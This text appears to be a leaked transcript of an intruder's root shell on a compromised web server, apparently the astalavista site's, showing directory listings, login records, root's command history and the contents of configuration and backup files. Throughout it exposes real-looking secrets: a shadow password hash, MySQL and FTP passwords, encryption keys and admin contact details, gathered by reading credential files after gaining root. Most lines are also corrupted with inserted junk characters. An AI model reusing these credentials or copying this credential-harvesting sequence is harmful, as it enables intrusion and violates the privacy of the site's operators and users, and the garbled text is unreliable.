astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
2 B, i- Q* D; \7 M9 e. n6 ]* {+ Y# D1 y
sh-3.2# cat /etc/motd
. P5 k: |7 u) G! v#####################################################
6 w1 k/ r* B, d- B#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #. L. g: X8 X. `. F
# |__| [__ | |__| | |__| | | | [__ | |__| #
% c6 \9 M) Y% P# | | ___] | | | |___ | | \/ | ___] | | | #
/ {( V; a$ W5 r" v g2 a: Y3 c# #7 o) F$ a' n( n* {2 }0 Z
#####################################################/ H. P$ x" S9 L9 U$ z8 q$ I3 h
# #6 y9 q- W! l% E* b2 J* h( N3 X2 t( X
# Admin Contact - 链接标记support@secureservertech.com #1 j" P4 H) p8 P3 |+ U9 [
# #* [2 D' v+ N! F6 y9 Q% w
# Available ShortCuts #
# J$ z# e$ T7 r0 w# t$ f% {# #' L1 s( Q: a0 V& c' h# R
# nst - list active connections #9 l- L) d! Z; k3 S7 y: n
# ddos - shows how many times each ip is connected #
9 ?/ q3 _' V7 @$ m% W6 n, w4 p9 s# ltr - restart the webserver #
5 _9 x$ W: J1 G2 }" a# phpc - edit the php config file # n% i, x3 R7 g. m8 X
# htc - edit the webserver configuration file #
! Q. X r! V/ T* {7 F+ _# up - uptime #0 |1 }9 |! p. p8 A1 \5 I
# etd - edit the motd of the day file #
* ^0 ?) _/ A y8 I Q% H' ?# htr - start and restart apache if needed #" b9 }$ `. R' S
# syng - shows active SYN_RECV connections #
( I5 d3 X6 ^/ C# synd - syn flood blocker - “synd -h” for usage #; t4 q+ |1 y5 v9 Z* t6 J
#####################################################
0 b0 y$ d; M7 j4 O# NOTES: #
4 J6 B/ r% _0 E' g* A9 A# Last Upgrade - 12-08-2008 by JF #. A3 t/ h5 I" ~* T0 H( _
# My.cnf/Mysql Optimization - 1-28-09 #; \. I, |. k) g
# #
+ J1 K4 @ U+ ?7 l5 m+ c9 {2 u1 A: Z# #2 y4 o2 L$ a% ?% y$ j" C' {5 D
# #3 Q( x5 Z% E( H# C4 }
#####################################################7 L1 K8 D) b6 A% c, @
/ d2 s1 G; \: r. d) K0 t0 s# Bsh-3.2# lastlog | grep -v Never* U5 H" q) v3 f+ K
Username Port From Latest
3 x" u" W9 f# lroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
! z& Q. O7 j: R4 y% yadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20080 c/ E" `& n) {+ K2 [! s, v: I
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009! }; ^4 ]; Q+ H* F; ~+ u
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20093 D# T" d* y+ d1 M
1 e2 S* _" ? X- U3 v( c$ gsh-3.2# ls -la
& j) M. V- S4 D* p6 m4 Q% y' p) Gtotal 453376
4 `) U# }; J- cdrwxr-x— 15 root root 4096 Jun 4 08:40 .! _/ b! c# U( o' X5 U. K
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
1 T, |( S( t% a5 P( l-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip# C( l+ j+ S" r: g& v
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg" P9 z$ ~- K& N+ {
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
; _2 E( k$ F/ m+ j+ |-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
; Z6 s9 C+ r2 |6 b-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
0 z7 X V3 n% L-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc6 K+ @' T( D& B7 d* x
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
+ w, T% Q& S5 N" T @7 X9 `. g8 H-rw-r–r– 1 root root 1327 Nov 29 2007 cert: N1 r( B1 M. j# |
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
4 ?/ P$ p6 M. Edrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
5 N* q. B+ O2 A; l& F+ }8 x% l( O-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
( p6 d5 ^/ v" J# {5 z-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
" b# f! i; E/ n6 G6 ^# |drwx—— 2 root root 4096 Oct 28 2007 .elinks
+ U8 T p6 F4 R2 W- A2 O: Cdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1$ U8 g* D9 i) }1 S' N% f
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
1 r) ?+ \3 N6 d+ r! T7 y8 z! R-rw——- 1 root root 0 Apr 16 13:19 .history
7 P# T2 o: S1 y1 u-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
6 v0 o. U& C! U n% K-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog+ h# P- N$ I7 [2 ^( A2 c# `1 v3 H5 L
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
# B' [- R: ~' M* ^-rw——- 1 root root 35 Jun 2 14:23 .lesshst
, o& u) Q3 t" }: Y7 L: p9 K- jdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
9 y4 n( b3 k1 L* U h ^drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
" p5 G; Q T2 Y- C; B-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
5 U1 y. n9 b* {, K9 S-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz20 v0 {! p8 u. t9 H- i) _- G5 o' O
-rwx—— 1 root root 760 Sep 18 2008 lp
, P& }% T, s6 \" ~9 udrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1; ]1 d# N6 H7 X5 b' g
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz( Y5 v: x | {; h7 {! z
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.11 a; \! t2 }# f% ^
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
* W a9 P; @: _% Y9 H-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
4 K( Y% n( i' L4 c% M7 z" Ddrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3: w0 e. G6 W1 h& M/ d4 b- m
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz* F* e, Q6 T! A/ d
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
0 x0 B6 k" r9 Y. N1 z, J+ w0 N8 T9 ^-rw——- 1 root root 41 Oct 19 2007 .my.cnf; e. n7 H1 b' R
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
* o) D5 g a; Y9 u-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport! h9 t) Y' f4 n$ T
-rw——- 1 root root 41 May 20 2008 .mytop
* J y+ [6 P( w) odrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6- G8 i* \; E1 f% |5 X3 y9 P
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
# @: u% E E2 G9 ^2 ?9 z1 }drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp8 |* q: n* I/ X- U
-rw——- 1 root root 1462 Sep 21 2007 opt.php
% R4 x) ?" z0 U5 ] r* o) B-rw-r–r– 1 root root 3371 Sep 22 2007 p2 X o/ c8 K; ^: L% H8 w# L+ R
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2) V, p2 N6 P# @3 \
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
* }) n+ x: Y; X4 [-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
4 h9 Y8 w+ Q* T! o' D-rw-r–r– 1 root root 887 Nov 28 2007 server.key4 `2 }* ]8 Q: I( k
drwx—— 2 root root 4096 Oct 10 2008 .ssh0 u* X9 Q7 ` _' q$ C% N2 X8 y
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat/ R; h% y' B' _ S8 J" s* l3 ^
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc7 [3 [# K4 Y" F
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
: Q# D* Y. p" y# }# l- ^$ N: w-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
7 P8 _, G7 w/ v5 Q$ U. Rdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
( Q" h6 k# v8 W$ y: r9 W I: @4 U-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh y: L/ d" B: W8 E' C0 a2 ~4 e& @
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.04 q3 R& X$ H! ^1 c1 V6 ?. X; w8 t
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
; p3 F: E u" @+ d. M-rw——- 1 root root 12997 May 16 2008 .viminfo
4 i. Z. q: o. ], H% N1 t4 Q
- h8 N% t ^! G7 t0 h) h! rsh-3.2# cat .bash_history
2 V" \9 t9 A3 r C' N[snip]
0 p6 A5 q6 B/ ]/ r' X" Nwget cp4sst.com/sstlinux.tar.gz; k* u% h' Z5 @
tar zxvf sstlinux.tar.gz: P4 S1 {9 T4 c" E
cd linux-2.6.27.10
. B- P) R/ P" Ish install.sh A5 j0 w5 d/ C* T
make bzImage ; make modules ; make modules_install ; make install9 D6 l, W* I# D/ n
make clean& y* ~( z+ u- _
service mysqld restart
! M6 P6 T6 h8 b% d[snip]/ q, m z+ @8 n7 O2 D9 J
cd /usr/sbin/ A' v! X# C( s' L" J7 X
chmod 4777 traceroute
3 ] ?3 {) K1 l/ Z$ Xchmod 4777 ping P, E. ]: g1 g/ I5 o- ?
traceroute -I 链接标记[url]www.astalavista.ch[/url]
* B) W. K% w: m) T& g% D/ b[snip]
. v: G- ?+ t! f: tvi /etc/csf/csf.conf, c; r& B. S2 z% D
traceroute google.ch/ x- ]! \$ w9 p: `$ Y( A
service csf restart% v1 }4 x! m! W9 P4 f
tracert google.ch
, a4 Z* ? {8 Q( Hservice csf restart
- i8 E6 N- S. a7 t$ ptraceroute 链接标记[url]www.google.ch[/url]& ~$ ^% B! G3 S/ p. P
tracert 链接标记[url]www.google.ch[/url]
$ C2 L' B/ F; ?# {: A# D, k" btraceroute 链接标记[url]www.google.ch[/url]/ ~# T* x+ Z- \; X
locate traceroute% ?9 e( h; R. A9 V
chown 4755 /bin/traceroute
, m* ?, n1 O& Achown 4777 /bin/traceroute
0 Z; M9 l4 z0 R1 ^. h) xlocate ping2 c3 J& {* m; t+ H; C1 p' o
chown 4755 /bin/ping
+ o+ r k5 S1 i* kchown 4777 /bin/ping y5 f$ K1 N; n1 \6 ~
cd /bin/
0 Z O; r) j/ [) ~ls -ali | grep ping8 y1 J9 `' R$ [ Y: L* r
chown root ping
- f7 w) X! n! X! qchmod 4755 ping
, y; c4 r# C8 G' L/ hls -ali | grep traceroute
! R! s# ?* V4 X8 I* Uchown root traceroute; I# M8 @: S+ d$ X8 _
chmod 4755 traceroute
: @3 `: S$ \3 Y- a& y! N, F+ Nls -ali | grep traceroute0 a, q& J0 y" e
traceroute -I 链接标记[url]www.google.ch[/url]* O( S. n5 U' d
traceroute 链接标记[url]www.google.ch[/url]/ a; e" L S- h5 ]
whois pmsantos.ch
3 N$ y5 q( a! V7 ]! i+ F/ Z[snip]
8 I: s: m/ B3 R. V2 ~9 xmysql -h com_contrexx2_live < /root/defaultp_ports.sql
7 H9 ]/ V5 X! Q6 _; d& h, w$ ~% rmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql# Q9 }/ c6 v8 K6 m! t: u P
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
4 _, K4 f2 i3 L7 Q. D* Rmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql1 z+ m& {" I* s# l b" z J
top" E* D% B' G1 ^ P
ping ssth.ch2 ?! u. t9 e# {
ping asdlkfaljgasd???ljg???lasj.ch
: b8 U" g5 L2 Zping asdlkfaljgasdlasj.ch8 Q; E- k% ^/ h( Z+ I
ping 链接标记[url]www.ssth.ch[/url]
5 Q; `9 ?& o0 ~# Q) jping ssth.ch' `2 u+ K/ Z v! ~/ r
nslookup 链接标记[url]www.google.ch[/url]
6 V* I3 r% V6 A6 o8 G% N' |nslookup 链接标记[url]www.ssth.ch[/url]
/ U% L, @) o; b4 Nman nslookup8 U- p; V& B3 V
ping 链接标记[url]www.google.ch[/url]
j# h) E9 Z+ A6 jnslookup 链接标记[url]www.google.ch[/url]
1 Q5 K5 i. q8 }! R Ynslookup 链接标记[url]www.google.ch[/url]
: P3 E8 T( T7 V3 g) N' N6 Vnslookup salfjasdlf.ch
6 p9 { o8 y; ?[snip]* ~. [8 x" w" \" X" s6 d1 G: u
openssl passwd -1 sadf
: H& h. h4 Q( ^8 r* r9 `openssl passwd -1 5cZNHstdTy, }' ]% A A F9 }& x: Q% h
mysql
: Z! o( F9 [0 L4 z# Smysql
c* l d$ l( M# l2 j9 glocate proftp/ W; x4 q0 j1 q! T3 U
vi /etc/proftpd.passwd* ^% C+ |4 H K: L
service proftpd restart2 Y% N7 _- y6 _
locate proftpd.conf
" {8 I5 w# B1 s8 C" S( @vi /etc/proftpd.conf }' t1 U5 y1 P; ?2 ~+ G0 f) d/ l
vi /etc/proftpd.passwd
V6 m2 `( N5 `" Kservice proftpd restart/ ~) j8 |* q* \1 o, |; b- d
[snip]
8 G. M3 d; \# {) u5 \* G/bin/sh /home/com/backup_system/backup.sh
9 q+ X3 F7 e! u6 U6 V! Ptar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
0 h, W) O# R( } amysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql$ I0 }7 ~% i0 I H! Y
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql$ S0 E/ r. U t, O% k* R+ V1 i2 D
ls -ali
, o; L. J, O9 O' t6 Y* i, \. lmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql. v% `" m1 [. C2 R; k; X
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql; H# x: V' r; m, u+ w" H) `
crontab -l
M- s7 y6 H0 W! |- Gcrontab -l3 B8 `# k% \' T# _
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
- n9 Y* y+ N+ L! d$ F# }$ g* z/home/com/public_html/modifications/cronjobs/exploits.sh, d) W6 o, O, }
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
$ y: r3 v, Q9 a' q6 Itar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
- o3 B: [' S9 L3 r Y2 o- l$ Rcd lsws-4.0.3, M( x4 P7 \7 C. a
sh install.sh
( J( k* ]: F5 \3 T& P7 vuptime4 ~0 i% }2 c4 A- Z
hdparm -tt /dev/sda" P" f4 t2 f* }) X" D/ r
iostat
+ k- ]) [# ? ^) xyum install iostat2 h0 M# G" ]8 q1 f, \
iostat. n9 s& b" e- I6 }$ P
whereis iostat k. F7 e& l1 z8 ~; b8 d' Y$ k
yjm clean all
. a/ A& s4 Q0 C) H* @0 `yum clean all ; yum -y update$ T: I7 J* _* w0 p) g9 l: O$ T% y0 _
iostat
* b, t! h3 g& X! v# _( ~9 Uyum install systat
& T6 g8 \( M8 c; [: x- o9 {: |/ Zrpm -qa | grep iostat0 }* {, r- P d0 S5 ~# m- u
rpm -qa | grep sysstat2 X4 K- @1 G$ R, Y! K g$ I% }, U
rpm -qa | grep systat
) p0 \- g/ ^: S q6 Bdmesg -c
9 Y4 _; \' n* v; Q+ w- M1 ssysctl -p1 w G+ B8 R- ], ^; Z
uname -r
: Z: h4 m( n! L8 X( ]cd /usr/src
9 x4 [& `: Z/ [3 Pwget nix101.com/kernels/sstlinux.tar.gz* y/ f# g5 q) c! s# F
shutdown -r now
! d& a5 t; [" ]: M! q4 _nano -w /boot/grub/grub.conf
" q2 ]3 G1 A8 O/ [/ |. Z+ D% d9 ~- U1 q- h3 }
sh-3.2# cat .my.cnf
1 s8 z/ m' x1 a0 b$ F' l$ m# ~ r[client]7 w6 p5 J, z# A0 N+ v9 Z* T
user=da_admin7 L. I9 Y* U5 s! s1 @* P
password=X9dctmRH
6 t1 u r. Z/ F' m/ w6 Y, h0 Y2 J7 p! N4 [- ^4 ]5 {8 X
sh-3.2# cat /home/com/backup_system/backup.sh
% U. T5 k/ S1 A# w& p* T# f#!/bin/sh& w% ~1 S) P- S: l
#####################################################################, I" K( d2 [9 C! j" M
# #5 H. G! d h+ C" V
# incremental backup for astalavista.com #
. o$ C& |# M, _/ c' z" ]; F- |( g( T# #
# L. h6 n `2 Z! z6 K) p# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #, m7 {: d5 G! |2 G4 l9 ~) h
# #
$ z0 X( H& H0 o' F#####################################################################
: m' n* P3 F2 F! M1 B3 K[snip]- v. \- t- D: [4 j+ r. A/ N
PROG_DIR=”/home/com/backup_system”;
9 {/ P5 ?+ w0 S! K: E/ TBACKUP_DIR=”/home/com/backups”;
8 S& m1 f7 N2 CDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;0 }4 j7 [ d" [. Q
# ftp for synology backup server
' C! j# E4 ^4 Y* i$ qFTP_HOST=”212.254.194.163″;. a% d: N9 }% G# v P
FTP_PORT=”21″;
. T! U" {1 u4 UFTP_USER=”astalavista.com”;
' k4 u7 W3 G, ?) x1 k8 U8 [/ eFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
0 c3 Q0 E; A3 A/ R) z W) M5 dFTP_DIR=”/astalavista.com”;3 y" d- \2 }$ t! s
# database
+ h+ N2 R3 ?2 m' {1 M$ ?/ FDB_HOST=”localhost”;
" B H+ @' L+ d0 |* BDB_USER=”contrexxuser2″;
6 X& _! w. I) U/ U% bDB_PASS=”0fEYNZgXz1pKe”;
+ d' k6 L& H- O! l KDB_DATABASE1=”com_contrexx2_live”;# W2 P @- e3 N3 s3 n6 y V
DB_DATABASE2=”com_contrexx2″;
, V: e# i% \. N) {& r+ d4 Q1 H[snip]" D- g1 B5 \/ h0 F" _& w
ftp -in $FTP_HOST $FTP_PORT <<EOF1 a8 t9 Q9 |5 x, ~ U0 G3 m% z
quote USER $FTP_USER
: Z. ?! l B% I" `! Oquote PASS $FTP_PASS
5 u6 s' X, Z& v* U j6 _cd $FTP_DIR) |+ T0 j" E% ^7 @% @
put $DB_FULLNAME-SQL_Dump.tar
9 e" P: O$ u2 I, [7 r0 I( ]. [. I1 Cput $BACKUP_FULLNAME-Public_HTML.tar
; E' m% O ~: W( Q* u9 I( h+ }5 }close, F9 f n+ C! M `8 m# b* {
bye
/ @2 F% m# v( T* ?3 l% ^9 JEOF
! L7 M% l9 b. x
% z' y: C5 Y+ Z( Bsh-3.2# cd /home
: x& G5 c0 _8 Fsh-3.2# ls -la9 C! r1 J0 q9 J0 `
total 120# M/ Q" |0 L/ `0 s4 w; T
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .3 e' b: y8 A0 h0 T" \& r( h
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..2 X: H* J" p4 D( q6 j- k, A
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin- @7 j$ {8 O6 S3 f/ r0 J
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group) U6 F; \# @8 b& T* F }$ E
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user& o" J4 _0 A1 y- p( n( @' h# ^
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet( |8 d5 v" E6 @/ ]. |
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
; {& t: u$ }) t! bdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
: ^4 C4 D4 U, rdrwx–x–x 10 com com 4096 Apr 28 12:40 com2 v# [0 b5 E, S) ~9 p
drwxr-xr-x 2 root root 4096 May 17 2007 ftp4 ^1 M3 e9 E- F" |+ U: C
drwx—— 3 jon jon 4096 Sep 21 2007 jon
( r1 G& b- T; ^drwx—— 2 root root 16384 Sep 11 2007 lost+found# Z$ _/ B' {" u3 E6 n
drwxr-xr-x 2 root root 4096 Sep 14 2007 my6 W) S; x4 H' q9 [# {
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
$ W( e" B; ?" d3 h$ Ndrwx—— 2 jon jon 4096 Sep 15 2007 test
3 Y% u( v. J5 J& Jdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
# `# e! r: l% `1 H9 A0 t
, X5 ~: x" j3 m$ P1 Ash-3.2# cd admin' Y: y7 K# {7 q
sh-3.2# ls -la3 o! J! k4 F6 o, F) E
total 1735896
* N( ~/ R# G4 V3 O" I \: i' Edrwx–x–x 9 admin admin 4096 Nov 28 2007 .
- D% e, H6 k" ?+ Z: Rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, N7 f3 P. L8 A. }drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups) L2 Y7 v R1 U; v5 S# I% k0 P! Y3 ?
drwx—— 2 admin admin 4096 Sep 28 2007 backups
, A( q6 \, ~3 d-rw——- 1 admin admin 860 Sep 17 2008 .bash_history' |) Z7 w" J' ]# U
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout: z7 N" F! A& d+ u
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile* I. h9 x: Y7 g8 I7 O2 D2 B# a9 q
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
6 `7 W* }7 p R& r9 w4 N1 ^3 Ndrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups! _. {4 m( X) y) h
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains* v1 h: B0 V/ v$ |, Y9 O% C
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
* d0 C0 }2 |* _7 U! [-rw-r–r– 1 root root 24 Sep 21 2007 info.php
) ~% n% i& [+ g: |drwx—— 2 admin admin 4096 Sep 21 2007 mail
$ Q% E* O! _" l' z-rw-r–r– 1 root root 716 Nov 28 2007 server.csr' ]) h7 p- z; o, z0 `
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
$ a* x9 t' |9 O8 |2 \-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow0 j) a5 v: }1 L$ d2 _. k) n
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz6 L7 O- [0 ]" ~1 O' a# L
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups! x& K% d# ?* P" u4 s; j5 t5 e$ L
( W" f2 J. q+ c/ Z" zsh-3.2# ..
. |6 U+ v$ l+ E/ @/ Hsh-3.2# cd jon
; d4 s1 R, ^' [sh-3.2# ls -la' D9 R# h; Y' w1 D% f+ N; u( b
total 36/ a4 m3 j" W; J/ T/ s
drwx—— 3 jon jon 4096 Sep 21 2007 . c$ d; ^2 i! y0 L0 L4 J; i
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..2 N0 a, X1 ~- @
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history' c3 ]0 P7 A% Q X( H% z
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
8 E1 S' O @/ b* W/ q" B m-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
C" A) Y0 G @$ X0 \-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc V' b: ?+ W5 o: j
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
c4 l6 ?- M* C1 sdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
0 _/ D7 g9 l. V3 e) i. d. n) x5 ?
5 r, ^8 k' O4 |8 F# Msh-3.2# cd ..* `( h( Q3 y' L" m# x$ W
sh-3.2# cd test
! V9 \% \( ^' g) s* [sh-3.2# ls -la
; ~# K& c7 l* f- ftotal 48
7 M" O; _- V7 B9 N( ^+ E) ^5 `drwx—— 2 jon jon 4096 Sep 15 2007 .) n' A {& [5 M- x# m! W9 r- r
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..( Q( X2 W$ m+ W. o
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
, Z6 h4 `3 t+ i2 Y-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout1 X5 p% G( N# A' h* N# W$ S( n+ j
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
! x! ?7 {. e! Z-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
% J" \" a. u; B' \' Tsh-3.2# cat .bash_history0 G, m; V. `3 a9 Z; \
/usr/bin/mysqladmin -u root password PoliuJhytg67
. R) I2 r" _# A. v& t1 d% k' U7 {4 x
1 B K% P7 S9 V9 i8 Csh-3.2# cd ..
0 p: R! z4 h! r' ~: Ash-3.2# cd astanet1 }# \2 p6 K/ ?8 |9 ~
sh-3.2# ls -la
: J8 s9 l: F) V/ C: stotal 52
, n& U& I9 {' u9 g; e$ vdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .8 W0 p( r7 V" [- H9 l+ T1 A
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
. y+ G& \% d: x" A3 Z1 Vdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth( s* _" R! s+ u" k- |- k0 Q+ ]
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
( A! M0 O% _, _3 Q- [+ m-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
( ?. c( z& p4 K-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
/ V* `$ t4 O$ y. |& s% M-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
6 j' P, v* ?# \) P1 J8 Edrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains c7 B5 t% `, p
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap$ T2 w; @$ X& r6 u
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
4 ]" _0 E& ` _) Q; Z6 w4 o-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history7 {' \0 j# r7 v8 R3 F2 n/ K
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html: Z2 o: F8 Q+ z; v1 ?
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow8 d# J1 \: \1 h! Q) v0 x; q
/ V: U. \1 N$ T: K8 c; Bsh-3.2# cd auth/
0 j) P0 d+ D, h& A$ c4 r9 s) h6 ?$ Qsh-3.2# ls -la
5 n: z* j# n; S1 s: btotal 28' A2 t: r0 f1 W
drwxr-xr-x 2 root root 4096 Dec 23 16:00 ." {. ?5 Z! q6 ~6 W
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..& J1 S# i0 A; Q
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php9 I! O4 U) {4 ~5 f
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php* h+ j/ I$ H% g- [! Q$ y1 C
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd% w4 k5 r$ r5 o5 K3 p
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
9 z; q3 w, I. [ P& _8 c4 V* I-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
6 `2 h1 ]9 h, a. S) I+ w( q) M9 y, W% o& ~
sh-3.2# cat hackercontest.config.inc.php
4 g( t. u5 [# U! {- V$ b<?PHP
6 q: A* F: H0 b/ W" C// Variabeln f?r Verbindung zur Datenbank //
9 v8 }" P8 \. v; F9 S( h5 P$conxHost = ‘localhost’; // MySQL hostname* k5 l) X0 y9 `% @# g v
$conxUser = ‘hackercontest’; // MySQL user7 c5 P# P7 x) p
$conxPassword = ‘K6m@7dUc’; // MySQL password, b5 Q8 C% S0 P3 C( z
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish0 S' G4 q( a' K' Y* [0 E$ y
?>3 M2 j2 h4 U5 \* L
sh-3.2# cat hosting.config.inc.php
1 B7 e% d9 h$ m# _1 N<?PHP
- }, j z# _" G, b$ r3 l( p// Variabeln f?r Verbindung zur Datenbank //
5 H9 a2 k! y, M0 E4 O$conxHost = ‘localhost’; // MySQL hostname g7 D: y) M* p( c
$conxUser = ‘hostinguser’; // MySQL user
~. |9 E; D3 ?0 Q$conxPassword = ‘cXvB3981′; // MySQL password" Q; C0 R Y. m- R* j8 f$ n
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish5 N; I m! v- [3 i- C
?>8 k N5 v) M3 t& B; d" e& `
F: r9 r: p8 P4 {" A8 fsh-3.2# cd ..
# P3 n; P+ o5 J n x9 d2 Hsh-3.2# cd com
, h8 g% s$ Q) z V, {; Y) Xsh-3.2# ls -la+ \) u; E$ c5 J& p7 e
total 141208
. _" l1 a" m, Y/ }drwx–x–x 10 com com 4096 Apr 28 12:40 .: r4 H$ L% w- D- z
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..% C/ h y) L D1 P
drwx—— 2 com com 4096 Jun 4 04:04 backups8 }: g6 Z, |+ ^0 A9 }2 S9 m9 c
